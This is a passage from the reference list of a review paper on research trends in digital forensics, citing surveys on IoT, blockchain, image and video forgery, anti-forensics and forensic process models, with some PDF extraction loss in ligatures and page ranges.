Stoyanova, Y. Nikoloudakis, S. Panagiotakis, E. Pallis, and E. K. Markakis, ``A survey on the Internet of Things (IoT) forensics: Challenges, approaches, and open issues,'' IEEE Commun. Surveys Tuts., vol. 22, no. 2, pp. 11911221, 2nd Quart., 2020. [54] R. Kamal, E. E.-D. Hemdan, and N. El-Fishway, ``A review study on blockchain-based iot security and forensics,'' Multimedia Tools Appl., vol. 80, pp. 132, Sep. 2021. [55] H. F. Atlam, E. El-Din Hemdan, A. Alenezi, M. O. Alassa , and G. B. Wills, ``Internet of Things forensics: A review,'' Internet Things, vol. 11, Sep. 2020, Art. no. 100220. VOLUME 10, 2022 25487 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews [56] P. Lutta, M. Sedky, M. Hassan, U. Jayawickrama, and B. B. Bas- taki, ``The complexity of Internet of Things forensics: A state-of- the-art review,'' Forensic Sci. Int., Digit. Invest., vol. 38, Sep. 2021, Art. no. 301210. [57] A. Sayakkara, N.-A. Le-Khac, and M. Scanlon, ``A survey of electromag- netic side-channel attacks and discussion on their case-progressing poten- tial for digital forensics,'' Digit. Invest., vol. 29, pp. 4354, Jun. 2019. [58] A. E. Omolara, A. Alabdulatif, O. I. Abiodun, M. Alawida, A. Alabdulatif, W. H. Alshoura, and H. Arshad, ``The Internet of Things security: A survey encompassing unexplored areas and new insights,'' Comput. Secur., vol. 112, Jan. 2022, Art. no. 102494. [59] O. Yakubu, N. C. Babu, and O. Adjei, ``A review of digital forensic challenges in the Internet of Things (IoT),'' Int. J. Mech. Eng. Technol., vol. 9, no. 1, pp. 915923, 2018. [60] N. Koroniotis, N. Moustafa, and E. Sitnikova, ``Forensics and deep learn- ing mechanisms for botnets in Internet of Things: A survey of challenges and solutions,'' IEEE Access, vol. 7, pp. 6176461785, 2019. [61] A. Ross, S. Banerjee, and A. Chowdhury, ``Security in smart cities: A brief review of digital forensic schemes for biometric data,'' Pattern Recognit. Lett., vol. 138, pp. 346354, Oct. 2020. [62] H. Studiawan, F. Sohel, and C. Payne, ``A survey on forensic investigation of operating system logs,'' Digit. Invest., vol. 29, pp. 120, Jun. 2019. [63] S. Khan, A. Gani, A. W. A. Wahab, M. A. Bagiwa, M. Shiraz, S. U. Khan, R. Buyya, and A. Y. Zomaya, ``Cloud log forensics: Foundations, state of the art, and future directions,'' ACM Comput. Surveys, vol. 49, no. 1, pp. 142, Mar. 2017. [64] R. A. Awad, S. Beztchi, J. M. Smith, B. Lyles, and S. Prowell, ``Tools, techniques, and methodologies: A survey of digital forensics for scada systems,'' in Proc. 4th Annu. Ind. Control Syst. Secur. Workshop, 2018, pp. 18. [65] M. Botacin, P. L. D. Geus, and A. Gr gio, ``Who watches the watchmen: A security-focused review on current state-of-the-art techniques, tools, and methods for systems and binary analysis on modern platforms,'' ACM Comput. Surv., vol. 51, no. 4, pp. 134, Jul. 2019. [66] T. Latzo, R. Palutke, and F. Freiling, ``A universal taxonomy and sur- vey of forensic memory acquisition techniques,'' Digit. Invest., vol. 28, pp. 5669, Mar. 2019. [67] G. Osbourne, ``Memory forensics: Review of acquisition and analysis techniques,'' Defence Sci. Technol. Organisation Edinburgh (Australia) Cyber Electron. Warfare Div, Tech. Rep., 2013. [68] A. Case and G. G. Richard, ``Memory forensics: The path forward,'' Digit. Invest., vol. 20, pp. 2333, Mar. 2017. [69] A. Al-Dhaqm, S. A. Razak, D. A. Dampier, K.-K. R. Choo, K. Siddique, R. A. Ikuesan, A. Alqarni, and V. R. Kebande, ``Categorization and organization of database forensic investigation processes,'' IEEE Access, vol. 8, pp. 112846112858, 2020. [70] O. M. Adedayo and M. S. Olivier, ``Ideal log setting for database forensics reconstruction,'' Digit. Invest., vol. 12, pp. 2740, Mar. 2015. [71] R. Chopade and V. K. Pachghare, ``Ten years of critical review on database forensics research,'' Digit. Invest., vol. 29, pp. 180197, Jun. 2019. [72] W. K. Hauger and M. S. Olivier, ``NOSQL databases: Forensic attribution implications,'' SAIEE Afr. Res. J., vol. 109, no. 2, pp. 119132, Jun. 2018. [73] V. Jusas, D. Birvinskas, and E. Gahramanov, ``Methods and tools of dig- ital triage in forensic context: Survey and future directions,'' Symmetry, vol. 9, no. 4, p. 49, Mar. 2017. [74] A. Al-Dhaqm, S. Razak, R. A. Ikuesan, V. R. Kebande, and S. Hajar Othman, ``Face validation of database forensic investigation metamodel,'' Infrastructures, vol. 6, no. 2, p. 13, Jan. 2021. [75] I. Sutherland, J. Evans, T. Tryfonas, and A. J. C. Blyth ``Acquiring volatile operating system data tools and techniques,'' Operating Syst. Rev., vol. 42, pp. 6573, Apr. 2008. [76] N. Beebe and J. Clark, ``Dealing with terabyte data sets in digital investi- gations,'' in Proc. IFIP Int. Fed. Inf. Process., vol. 194, 2006, pp. 316. [77] D. Quick and K.-K.-R. Choo, ``Impacts of increasing volume of digital forensic data: A survey and future research challenges,'' Digit. Invest., vol. 11, no. 4, pp. 273294, Dec. 2014. [78] B. Almaslukh, ``Forensic analysis using text clustering in the age of large volume data: A review,'' Int. J. Adv. Comput. Sci. Appl., vol. 10, no. 6, pp. 7176, 2019. [79] V. H. G. Moia and M. A. A. Henriques, ``Similarity digest search: A survey and comparative analysis of strategies to perform known le ltering using approximate matching,'' Secur. Commun. Netw., vol. 2017, pp. 117, 2017.[80] F. Casino, T. Dasaklis, and C. Patsakis, ``A systematic literature review of blockchain-based applications: Current status, classi cation and open issues,'' Telematics Inform., vol. 36, pp. 5581, Mar. 2019. [81] B. Shanmugam, S. Azam, K. C. Yeo, J. Jose, and K. Kannoorpatti, ``A critical review of bitcoins usage by cybercriminals,'' in Proc. Int. Conf. Comput. Commun. Informat. (ICCCI), Jan. 2017, pp. 17. [82] T. K. Dasaklis, F. Casino, and C. Patsakis, ``Sok: Blockchain solutions for forensics,'' in Technology Development for Security Practitioners . Cham, Switzerland: Springer, 2021. [83] A. Balaskas and V. N. L. Franqueira, ``Analytical tools for blockchain: Review, taxonomy and open challenges,'' in Proc. Int. Conf. Cyber Secur. Protection Digit. Services (Cyber Security), Jun. 2018, pp. 18. [84] A. Turner and A. S. M. Irwin, ``Bitcoin transactions: A digital discovery of illicit activity on the blockchain,'' J. Financial Crime, vol. 25, no. 1, pp. 109130, Jan. 2018. [85] H. Chen, M. Pendleton, L. Njilla, and S. Xu, ``A survey on ethereum systems security: Vulnerabilities, attacks, and defenses,'' ACM Comput. Surv., vol. 53, no. 3, pp. 143, May 2021. [86] I. Homoliak, S. Venugopalan, D. Reijsbergen, Q. Hum, R. Schumi, and P. Szalachowski, ``The security reference architecture for blockchains: Toward a standardized model for studying vulnerabilities, threats, and defenses,'' IEEE Commun. Surveys Tuts., vol. 23, no. 1, pp. 341390, 1st Quart., 2021. [87] Z. Wang, H. Jin, W. Dai, K.-K.-R. Choo, and D. Zou, ``Ethereum smart contract security research: Survey and future research opportunities,'' Frontiers Comput. Sci., vol. 15, no. 2, Apr. 2021, Art. no. 152802. [88] W. Koerhuis, T. Kechadi, and N.-A. Le-Khac, ``Forensic analysis of privacy-oriented cryptocurrencies,'' Forensic Sci. Int., Digit. Invest., vol. 33, Jun. 2020, Art. no. 200891. [89] M. Saad, J. Spaulding, L. Njilla, C. Kamhoua, S. Shetty, D. Nyang, and D. Mohaisen, ``Exploring the attack surface of blockchain: A comprehen- sive survey,'' IEEE Commun. Surveys Tuts., vol. 22, no. 3, pp. 19772008, 3rd Quart., 2020. [90] E. Deirmentzoglou, G. Papakyriakopoulos, and C. Patsakis, ``A survey on long-range attacks for proof of stake protocols,'' IEEE Access, vol. 7, pp. 2871228725, 2019. [91] H. Farid, ``Image forgery detection,'' IEEE Signal Process. Mag., vol. 26, no. 2, pp. 1625, Mar. 2009. [92] K. A. P. da Costa, J. P. Papa, L. A. Passos, D. Colombo, J. D. Ser, K. Muhammad, and V. H. C. de Albuquerque, ``A critical literature survey and prospects on tampering and anomaly detection in image data,'' Appl. Soft Comput., vol. 97, Dec. 2020, Art. no. 106727. [93] A. H. Saber, M. A. Khan, and B. G. Mejbel, ``A survey on image forgery detection using different forensic approaches,'' Adv. Sci., Technol. Eng. Syst. J., vol. 5, no. 3, pp. 361370, 2020. [94] L. Zheng, Y. Zhang, and L. Vrizlynn, ``A survey on image tampering and its detection in real-world photos,'' J. Vis. Commun. Image Represent., vol. 58, pp. 380399, Jan. 2019. [95] S. Bourouis, R. Alroobaea, A. Alharbi, M. Andejany, and S. Rubaiee, ``Recent advances in digital multimedia tampering detection for forensics analysis,'' Symmetry, vol. 12, no. 11, pp. 126, 2020. [96] H. Kaur and N. Jindal, ``Image and video forensics: A critical survey,'' Wireless Pers. Commun., vol. 112, no. 2, pp. 12811302, May 2020. [97] M. D. Ansari, E. Rashid, S. Skandha, and S. K. Gupta, ``A comprehensive analysis of image forensics techniques: Challenges and future direction,'' Recent Patents Eng., vol. 13, pp. 110, Dec. 2019. [98] R. C. Pandey, S. K. Singh, and K. K. Shukla, ``Passive forensics in image and video using noise features: A review,'' Digit. Invest., vol. 19, pp. 128, Dec. 2016. [99] S. Gupta, N. Mohan, and P. Kaushal, ``Passive image forensics using universal techniques: A review,'' Artif. Intell. Rev., vol. 2021, pp. 151, Jul. 2021. [100] M. A. Qureshi and M. Deriche, ``A bibliography of pixel-based blind image forgery detection techniques,'' Signal Process., Image Commun., vol. 39, pp. 4674, Nov. 2015. [101] A. R. Abrahim, M. S. M. Rahim, and G. B. Sulong, ``Literature review: Detection of image splicing forgery,'' Int. J. Appl. Eng. Res., vol. 12, no. 22, pp. 1185511861, 2017. [102] R. Dixit and R. Naskar, ``Review, analysis and parameterisation of tech- niques for copymove forgery detection in digital images,'' IET Image Process., vol. 11, no. 9, pp. 746759, Sep. 2017. [103] S. Teerakanok and T. Uehara, ``Copy-move forgery detection: A state- of-the-art technical review and analysis,'' IEEE Access, vol. 7, pp. 4055040568, 2019. 25488 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews [104] Z. Zhang, C. Wang, and X. Zhou, ``A survey on passive image copy-move forgery detection,'' J. Inf. Process. Syst., vol. 14, no. 1, pp. 631, 2018. [105] G. K. Birajdar and V. H. Mankar, ``Digital image forgery detection using passive techniques: A survey,'' Digital Invest., vol. 10, no. 3, pp. 226245, Oct. 2013. [106] R. R. Ali, K. M. Mohamad, S. Jamel, and S. K. A. Khalid, ``A review of digital forensics methods for JPEG le carving,'' J. Theor. Appl. Inf. Technol., vol. 96, no. 17, pp. 58415856, 2018. [107] M. J. Khan, H. S. Khan, A. Yousaf, K. Khurshid, and A. Abbas, ``Modern trends in hyperspectral image analysis: A review,'' IEEE Access, vol. 6, pp. 1411814129, 2018. [108] P. Korus, ``Digital image integrityA survey of protection and veri ca- tion techniques,'' Digit. Signal Process., vol. 71, pp. 126, Dec. 2017. [109] T. Julliand, V. Nozick, and H. Talbot, ``Image noise and digital image forensics,'' in Proc. Int. Workshop Digit. Watermarking . Cham, Switzerland: Springer, 2015, pp. 317. [110] S. Chutani and A. Goyal, ``A review of forensic approaches to dig- ital image steganalysis,'' Multimedia Tools Appl., vol. 78, no. 13, pp. 1816918204, Jul. 2019. [111] K. Karampidis, E. Kavallieratou, and G. Papadourakis, ``A review of image steganalysis techniques for digital forensics,'' J. Inf. Secur. Appl., vol. 40, pp. 217235, Jun. 2018. [112] X. Luo, F. Liu, S. Lian, C. Yang, and S. Gritzalis, ``On the typical statistic features for image blind steganalysis,'' IEEE J. Sel. Areas Commun., vol. 29, no. 7, pp. 14041422, Aug. 2011. [113] P. Yang, D. Baracchi, R. Ni, Y. Zhao, F. Argenti, and A. Piva, ``A survey of deep learning-based source image forensics,'' J. Imag., vol. 6, no. 3, p. 9, Mar. 2020. [114] M. Dalal and M. Juneja, ``Steganography and steganalysis (in digital forensics): A cybersecurity guide,'' Multimedia Tools Appl., vol. 80, no. 4, pp. 57235771, Feb. 2021. [115] V. N. L. Franqueira, J. Bryce, N. Al Mutawa, and A. Marrington, ``Inves- tigation of indecent images of children cases: Challenges and sugges- tions collected from the trenches,'' Digit. Invest., vol. 24, pp. 95105, Mar. 2018. [116] L. Sanchez, C. Grajeda, I. Baggili, and C. Hall, ``A practitioner survey exploring the value of forensic tools, AI, ltering, & safer presentation for investigating child sexual abuse material (CSAM),'' Digit. Invest., vol. 29, pp. S124S142, Jul. 2019. [117] J. Cifuentes, A. L. S. Orozco, and L. J. G. Villalba, ``A survey of arti- cial intelligence strategies for automatic detection of sexually explicit videos,'' Multimedia Tools Appl., vol. 39, pp. 118, Nov. 2021. [118] K. V. A ar, ``Osint by crowdsourcing: A theoretical model for online child abuse investigations,'' Int. J. Cyber Criminol., vol. 12, no. 1, pp. 206229, 2018. [119] E. Nowroozi, A. Dehghantanha, R. M. Parizi, and K.-K.-R. Choo, ``A sur- vey of machine learning techniques in adversarial image forensics,'' Comput. Secur., vol. 100, Jan. 2021, Art. no. 102092. [120] M. Dalal and M. Juneja, ``Video steganalysis to obstruct criminal activi- ties for digital forensics: A survey,'' Int. J. Electron. Secur. Digit. Foren- sics, vol. 10, no. 4, pp. 338355, 2018. [121] S. Kingra, N. Aggarwal, and R. D. Singh, ``Video inter-frame forgery detection: A survey,'' Indian J. Sci. Technol., vol. 9, no. 44, Nov. 2016. [122] N. A. Shelke and S. S. Kasana, ``A comprehensive survey on passive techniques for digital video forgery detection,'' Multimedia Tools Appl., vol. 80, no. 4, pp. 62476310, Feb. 2021. [123] A. S. Shahraki, H. Sayyadi, M. H. Amri, and M. Nikmaram, ``Sur- vey: Video forensic tools,'' J. Theor. Appl. Inf. Technol., vol. 47, no. 1, pp. 98107, 2013. [124] M. Alsmirat, R. Al-Hussien, W. Al-Sarayrah, Y. Jararweh, and M. Etier, ``Digital video forensics: A comprehensive survey,'' Int. J. Adv. Intell. Paradigms, vol. 15, no. 4, pp. 437456, 2020. [125] F. Becerra-Riera, A. Morales-Gonz lez, and H. M ndez-V zquez, ``A sur- vey on facial soft biometrics for video surveillance and forensic applica- tions,'' Artif. Intell. Rev., vol. 52, no. 2, pp. 11551187, Aug. 2019. [126] S. T and S. M. Thampi, ``Nighttime visual re nement techniques for surveillance video: A review,'' Multimedia Tools Appl., vol. 78, no. 22, pp. 3213732158, Nov. 2019. [127] R. D. Singh and N. Aggarwal, ``Video content authentication techniques: A comprehensive survey,'' Multimedia Syst., vol. 24, no. 11, pp. 211240, Mar. 2018. [128] M. Zakariah, M. K. Khan, and H. Malik, ``Digital multimedia audio forensics: Past, present and future,'' Multimedia Tools Appl., vol. 77, no. 1, pp. 10091040, Jan. 2018.[129] K. Conlan, I. Baggili, and F. Breitinger, ``Anti-forensics: Furthering dig- ital forensic science through a new extended, granular taxonomy,'' Digit. Invest., vol. 18, pp. S66S75, Aug. 2016. [130] M. A. Qureshi and E. M. El-Alfy, ``Bibliography of digital image anti-forensics and anti-anti-forensics techniques,'' IET Image Process., vol. 13, no. 11, pp. 18111823, Sep. 2019. [131] F. Guibernau, ``Catch me if you can!Detecting sandbox evasion tech- niques,'' in Proc. USENIX Assoc., San Francisco, CA, USA, Jan. 2020. [132] P. Chen, C. Huygens, L. Desmet, and W. Joosen, ``Advanced or not? A comparative study of the use of anti-debugging and anti-VM techniques in generic and targeted malware,'' in Proc. IFIP Int. Conf. ICT Syst. Secur. Privacy Protection. Cham, Switzerland: Springer, 2016, pp. 323336. [133] A. Bulazel and B. Yener, ``A survey on automated dynamic malware analysis evasion and counter-evasion: PC, mobile, and Web,'' in Proc. 1st Reversing Offensive-oriented Trends Symp. (ROOTS), 2017, pp. 121. [134] R. R. Branco, G. N. Barbosa, and P. D. Neto, ``Scienti c but not academ- ical overview of malware anti-debugging, anti-disassembly and anti-VM technologies,'' Black Hat, vol. 1, pp. 127, Jul. 2012. [135] R. Harris, ``Arriving at an anti-forensics consensus: Examining how to de ne and control the anti-forensics problem,'' Digit. Invest., vol. 3, pp. 4449, Sep. 2006. [136] S. Alharbi, J. Weber-Jahnke, and I. Traore, ``The proactive and reactive digital forensics investigation process: A systematic literature review,'' in Information Security and Assurance, T.-H. Kim, H. Adeli, R. J. Robles, and M. Balitanas, Eds. Berlin, Heidelberg: Springer, 2011, pp. 87100. [137] A. Al-Dhaqm, R. A. Ikuesan, V. R. Kebande, S. Razak, and F. M. Ghab- ban, ``Research challenges and opportunities in drone forensics models,'' Electronics, vol. 10, no. 13, p. 1519, Jun. 2021. [138] G. Horsman, ``Unmanned aerial vehicles: A preliminary analysis of forensic challenges,'' Digit. Invest., vol. 16, pp. 111, Mar. 2016. [139] S. Atkinson, G. Carr, C. Shaw, and S. Zargari, Drone Forensics: The Impact and Challenges. Cham, Switzerland: Springer, 2021, pp. 65124. [140] F. Adelstein, ``Live forensics: Diagnosing your system without killing it rst,'' Commun. ACM, vol. 49, no. 2, pp. 6366, Feb. 2006. [141] A. Renduchintala, F. Jahan, R. Khanna, and A. Y. Javaid, ``A comprehen- sive micro unmanned aerial vehicle (UA V/drone) forensic framework,'' Digit. Invest., vol. 30, pp. 5272, Sep. 2019. [142] E. Mantas and C. Patsakis, ``Who watches the new watchmen? The challenges for drone digital forensics investigations,'' arXiv preprint arXiv:2021.12640, 2021. [143] M. Keyvanpour, M. Moradi, and F. Hasanzadeh, ``Digital forensics 2.0,'' inComputational Intelligence in Digital Forensics: Forensic Investiga- tion and Applications. Cham, Switzerland: Springer, 2014, pp. 1746. [144] T. Sangkaran, A. Abdullah, and N. Z. JhanJhi, ``Criminal network community detection using graphical analytic methods: A survey,'' EAI Endorsed Trans. Energy Web, vol. 7, no. 26, pp. 115, 2020. [145] G. De La T. Parra, P. Rad, and K.-K. R. Choo, ``Implementation of deep packet inspection in smart grids and industrial Internet of Things: Chal- lenges and opportunities,'' J. Netw. Comput. Appl., vol. 135, pp. 3246, Jun. 2019. [146] E. Batista, M. A. Moncusi, P. L pez-Aguilar, A. Mart nez-Ballest , and A. Solanas, ``Sensors for context-aware smart healthcare: A security perspective,'' Sensors, vol. 21, no. 20, p. 6886, Oct. 2021. [147] G. Ahmadi-Assalemi, H. Al-Khateeb, G. Epiphaniou, and C. Maple, ``Cyber resilience and incident response in smart cities: A systematic literature review,'' Smart Cities, vol. 3, no. 3, pp. 894927, Aug. 2020. [148] S. Gar nkel, P. Farrell, V. Roussev, and G. Dinolt, ``Bringing science to digital forensics with standardized forensic corpora,'' Digit. Invest., vol. 6, pp. S2S11, Sep. 2009. [Online]. Available: https://www.sciencedirect.com/science/article/pii/S1742287609000346 [149] C. Grajeda, F. Breitinger, and I. Baggili, ``Availability of datasets for digital forensics- and what is missing,'' Digit. Invest., vol. 22, pp. S94S105, Aug. 2017. [Online]. Available: https://www.sciencedirect.com/science/article/pii/S1742287617301913 [150] M. K hn, M. S. Olivier, and J. H. Eloff, ``Framework for a digital forensic investigation,'' in Proc. ISSA, 2006, pp. 17. [151] W. Halboob and R. Mahmod, ``State of the art in trusted computing forensics,'' in Future Information Technology, Application, and Service. Dordrecht, The Netherlands: Springer, 2012, pp. 249258. [152] M. D. Kohn, M. M. Eloff, and J. H. P. Eloff, ``Integrated digital forensic process model,'' Comput. Secur., vol. 38, pp. 103115, Oct. 2013. [153] H. I. Bulbul, H. G. Yavuzcan, and M. Ozel, ``Digital forensics: An analytical crime scene procedure model (ACSPM),'' Forensic Sci. Int., vol. 233, nos. 13, pp. 244256, Dec. 2013. VOLUME 10, 2022 25489 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews [154] A. Agarwal, M. Gupta, S. Gupta, and S. C. Gupta, ``Systematic digital forensic investigation model,'' Int. J. Comput. Sci. Secur., vol. 5, no. 1, pp. 118131, 2011. [155] R. Adams, V. Hobbs, and G. Mann, ``The advanced data acquisition model (Adam): A process model for digital forensic practice,'' J. Digit. Forensics, Secur. Law, vol. 8, no. 4, pp. 2548, 2013. [156] J. Williams, ``ACPO good practice guide for digital evidence,'' Metrop. Police Service, Assoc. Chief Police Of cers, GB, Tech. Rep., 2012. [157] K. Kent, S. Chevalier, T. Grance, and H. Dang, ``SP 800-86. guide to inte- grating forensic techniques into incident response,'' Nat. Inst. Standards Technol., Gaithersburg, MD, USA, Tech. Rep., 2006. [158] W. G. Kruse II and J. G. Heiser, Computer Forensics: Incident Response Essentials. London, U.K.: Pearson, 2001. [159] M. Reith, C. Carr, and G. Gunsch, ``An examination of digital forensic models,'' Int. J. Digit. Evidence, vol. 1, no. 3, pp. 112, 2002. [160] B. Carrier and E. H. Spafford, ``Getting physical with the investigative process,'' Int. J. Digit. Evidence, 2003. [161] V. Baryamureeba and F. Tushabe, ``The enhanced digital investigation process model,'' Digit. Invest., 2004. [162] S. O. Ciardhu in, ``An extended model of cybercrime investigations,'' International Journal of Digital Evidence, vol. 3, no. 1, pp. 122, 2004. [163] I. O, D. Chris, and D. David, ``A new approach of digital forensic model for digital forensic investigation,'' Int. J. Adv. Comput. Sci. Appl., vol. 2, no. 12, pp. 175178, 2011. [164] (2020). European Network of Forensic Science Institutes. Foren- sic Guidelines. [Online]. Available: http://enfsi.eu/documents/forensic- guidelines/ [165] Y. Yusoff, R. Ismail, and Z. Hassan, ``Common phases of computer forensics investigation models,'' Int. J. Comput. Sci. Inf. Technol., vol. 3, no. 3, pp. 1731, 2011. [166] K. Kyei, P. Zavarsky, D. Lindskog, and R. Ruhl, ``A review and compar- ative study of digital forensic investigation models,'' in Digital Forensics and Cyber Crime, M. Rogers and K. C. Seigfried-Spellar, Eds. Berlin, Germany: Springer, 2013, pp. 314327. [167] S. Bonomi, M. Casini, and C. Ciccotelli, ``B-CoC: A blockchain-based chain of custody for evidences management in digital forensics,'' 2018, arXiv:1807.10359. [168] Z. Tian, M. Li, M. Qiu, Y. Sun, and S. Su, ``Block-DEF: A secure digital evidence framework using blockchain,'' Inf. Sci., vol. 491, pp. 151165, Jul. 2019. [169] R. S. Green eld et al., Cyber Forensics: A Field Manual for Collecting, Examining, and Preserving Evidence of Computer Crimes. Boca Raton, FL, USA: CRC Press, 2002. [170] D. Reilly, C. Wren, and T. Berry, ``Cloud computing: Forensic challenges for law enforcement,'' in Proc. Int. Conf. Internet Technol. Secured Trans., Nov. 2010, pp. 17. [171] S. L. Gar nkel, ``Digital forensics research: The next 10 years,'' Digital Investigation, vol. 7, pp. S64S73, Aug. 2010. [172] A. Guarino, ``Digital forensics as a big data challenge,'' in ISSE Securing Electronic Business Processes. Wiesbaden, Germany: Springer, 2013, pp. 197203. [173] G. Mohay, ``Technical challenges and directions for digital forensics,'' in Proc. 1st Int. Workshop Systematic Approaches to Digit. Forensic Eng. (SADFE), Nov. 2005, pp. 155161. [174] Z. Li, Q. A. Chen, R. Yang, Y. Chen, and W. Ruan, ``Threat detection and investigation with system-level provenance graphs: A survey,'' Comput. Secur., vol. 106, Jul. 2021, Art. no. 102282. [175] A. Al-Dhaqm, S. A. Razak, R. A. Ikuesan, V. R. Kebande, and K. Siddique, ``A review of mobile forensic investigation process models,'' IEEE Access, vol. 8, pp. 173359173375, 2020. [176] M. Abulaish and N. A. H. Haldar, ``Advances in digital forensics frame- works and tools: A comparative insight and ranking,'' Int. J. Digit. Crime Forensics, vol. 10, no. 2, pp. 95119, 2018. [177] R. Agarwal and S. Kothari, ``Review of digital forensic investigation frameworks,'' in Information Science and Applications (Lecture Notes in Electrical Engineering), vol. 339. Berlin, Germany: Springer-Verlag, 2015, pp. 561571. [178] P. Amann and J. I. James, ``Designing robustness and resilience in dig- ital investigation laboratories,'' Digit. Invest., vol. 12, pp. S111S120, Mar. 2015.[179] R. Montasari, ``An ad hoc detailed review of digital forensic investigation process models,'' Int. J. Electron. Secur. Digit. Forensics, vol. 8, no. 3, pp. 205223, 2016. [180] R. Sabillon, J. Serra-Ruiz, V. Cavaller, and J. J. Cano, ``Digital forensic analysis of cybercrimes: Best practices and methodologies,'' Int. J. Inf. Secur. Privacy, vol. 11, no. 2, pp. 2537, 2017. [181] Information TechnologySecurity TechniquesGuidelines for Identi - cation, Collection, Acquisition and Preservation of Digital Evidence, Joint Technical Committee ISO/IEC JTC, International Organization for Standardization, Geneva, CH, Standard ISO/IEC 27037:2012, 2012. [Online]. Available: https://www.iso.org/standard/44381.html [182] European Telecommunications Standards Institute. (2020). Techniques for Assurance of Digital Material Used in Legal ProceedingsETSI TS 103 643 v1.1.1 (2020-01). [Online]. Available: https://www.etsi.org/del iver/etsi_ts/103600_103699/103643/01.01.01_60/t% s_103643v010101p.pdf [183] K. Kent, S. Chevalier, T. Grance, and H. Dang, ``SP 800-86. guide to inte- grating forensic techniques into incident response,'' Nat. Inst. Standards Technol., Tech. Rep., 2006. [184] R. Ayers, S. Brothers, and W. Jansen. (May 2014). Guidelines on Mobile Device Forensics . [Online]. Available: https://csrc.nist. gov/publications/detail/sp/800-101/rev-1/ nal [185] L. Wilson-Wilde, ``The international development of forensic science standardsA review,'' Forensic Sci. Int., vol. 288, pp. 19, Jul. 2018. [186] M. Robinson. (2015). Digital Forensics Workbook: Hands-on Activi- ties in Digital Forensics. CreateSpace Independent Publishing Platform. [Online]. Available: https://books.google.gr/books?id=4dyHjgEACAAJ [187] J. Tan, Forensic Readiness. Cambridge, MA, USA: Stake, 2001, pp. 123. [188] K. Reddy and H. S. Venter, ``The architecture of a digital forensic readiness management system,'' Comput. Secur., vol. 32, pp. 7389, Feb. 2013. [189] M. Elyas, A. Ahmad, S. B. Maynard, and A. Lonie, ``Digital forensic readiness: Expert perspectives on a theoretical framework,'' Comput. Secur., vol. 52, pp. 7089, Jul. 2015. [190] B. Endicott-Popovsky, N. Kuntze, and C. Rudolph, ``Forensic readiness: Emerging discipline for creating reliable and secure digital evidence,'' J. Harbin Inst. Technol., vol. 22, no. 1, pp. 18, 2015. [191] A. Mouhtaropoulos, C. T. Li, and M. Grobler, ``Digital forensic readiness: Are we there yet?'' J. Int. Commercial Law Technol., vol. 9, no. 3, pp. 173179, 2014. [192] A. M. Marshall and R. Paige, ``Requirements in digital forensics method de nition: Observations from a U.K. study,'' Digit. Invest., vol. 27, pp. 2329, Dec. 2018. [193] V. S. Harichandran, F. Breitinger, I. Baggili, and A. Marrington, ``A cyber forensics needs analysis survey: Revisiting the domain's needs a decade later,'' Comput. Secur., vol. 57, pp. 113, Mar. 2016. [194] M. Ozel, H. I. Bulbul, H. G. Yavuzcan, and O. F. Bay, ``An analytical analysis of Turkish digital forensics,'' Digit. Invest., vol. 25, pp. 5569, Jun. 2018. [195] S. Park, N. Akatyev, Y. Jang, J. Hwang, D. Kim, W. Yu, H. Shin, C. Han, and J. Kim, ``A comparative study on data protection legislations and gov- ernment standards to implement digital forensic readiness as mandatory requirement,'' Digit. Invest., vol. 24, pp. S93S100, Mar. 2018. [196] H. Arshad, A. B. Jantan, and O. I. Abiodun, ``Digital forensics: Review of issues in scienti c validation of digital evidence,'' J. Inf. Process. Syst., vol. 14, no. 2, pp. 346376, 2018. [197] A. Butler and K.-K.-R. Choo, ``IT standards and guides do not adequately prepare IT practitioners to appear as expert witnesses: An Australian perspective,'' Secur. J., vol. 29, no. 2, pp. 306325, Apr. 2016. [198] A. S. Bali, G. Edmond, K. N. Ballantyne, R. I. Kemp, and K. A. Martire, ``Communicating forensic science opinion: An examination of expert reporting practices,'' Sci. Justice, vol. 60, no. 3, pp. 216224, May 2020. [199] L. M. Howes and N. Kemp, ``Discord in the communication of forensic science: Can the science of language help foster shared understanding?'' J. Lang. Social Psychol., vol. 36, no. 1, pp. 96111, Jan. 2017. [200] L. M. Howes, K. P. Kirkbride, S. F. Kelty, R. Julian, and N. Kemp, ``The readability of expert reports for non-scientist report-users: Reports of forensic comparison of glass,'' Forensic Sci. Int., vol. 236, pp. 5466, Mar. 2014. [201] L. M. Howes, K. P. Kirkbride, S. F. Kelty, R. Julian, and N. Kemp, ``Foren- sic scientists' conclusions: How readable are they for non-scientist report- users?'' Forensic Sci. Int., vol. 231, nos. 13, pp. 102112, Sep. 2013. 25490 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews [202] M. A. K. Halliday, ``Some grammatical problems in scienti c English,'' Genre Systemic Funct. Stud., vol. 6, pp. 1337, Jan. 1989. [203] S. Eggins, Introduction to Systemic Functional Linguistics . A&C Black, 2004. [204] R. Flesch, ``A new readability yardstick,'' J. Appl. Psychol., vol. 32, no. 3, p. 221, 1948. [205] R. Flesch and A. J. Gould, The Art Readable Writing, vol. 8. New York, NY, USA: Harper, 1949. [206] J. P. Kincaid, R. P. Fishburne, Jr., R. L. Rogers, and B. S. Chissom, ``Derivation of new readability formulas (automated readability index, fog count and esch reading ease formula) for navy enlisted personnel,'' Naval Tech. Training Command Millington TN Res. Branch, Tech. Rep., 1975. [207] R. Clerehan, R. Buchbinder, and J. Moodie, ``A linguistic framework for assessing the quality of written patient information: Its use in assessing methotrexate information for rheumatoid arthritis,'' Health Educ. Res., vol. 20, no. 3, pp. 334344, Jun. 2005. [208] P. B. Mosenthal and I. S. Kirsch, ``A new measure for assessing document complexity: The pmose/ikirsch document readability formula,'' J. Adoles- cent Adult Literacy, vol. 41, no. 8, pp. 638657, 1998. [209] J. L. Calder n, E. Fleming, M. R. Gannon, S.-C. Chen, J. A. Vassalotti, and K. C. Norris, ``Applying an expanded set of cognitive design principles to formatting the kidney early evaluation program (KEEP) longitudinal survey,'' Amer. J. Kidney Diseases, vol. 51, no. 4, pp. S83S92, Apr. 2008. [210] M. Graves and B. Graves, ``Assessing text dif culty and accessibility,'' inScaffolding Reading Experiences: Designs for Student Success . Nor- wood, MA, USA: Christopher-Gordon, 2003. [211] J. Cosic, ``Formal acceptability of digital evidence,'' in Multimedia Foren- sics and Security. Cham, Switzerland: Springer, 2017, pp. 327348. 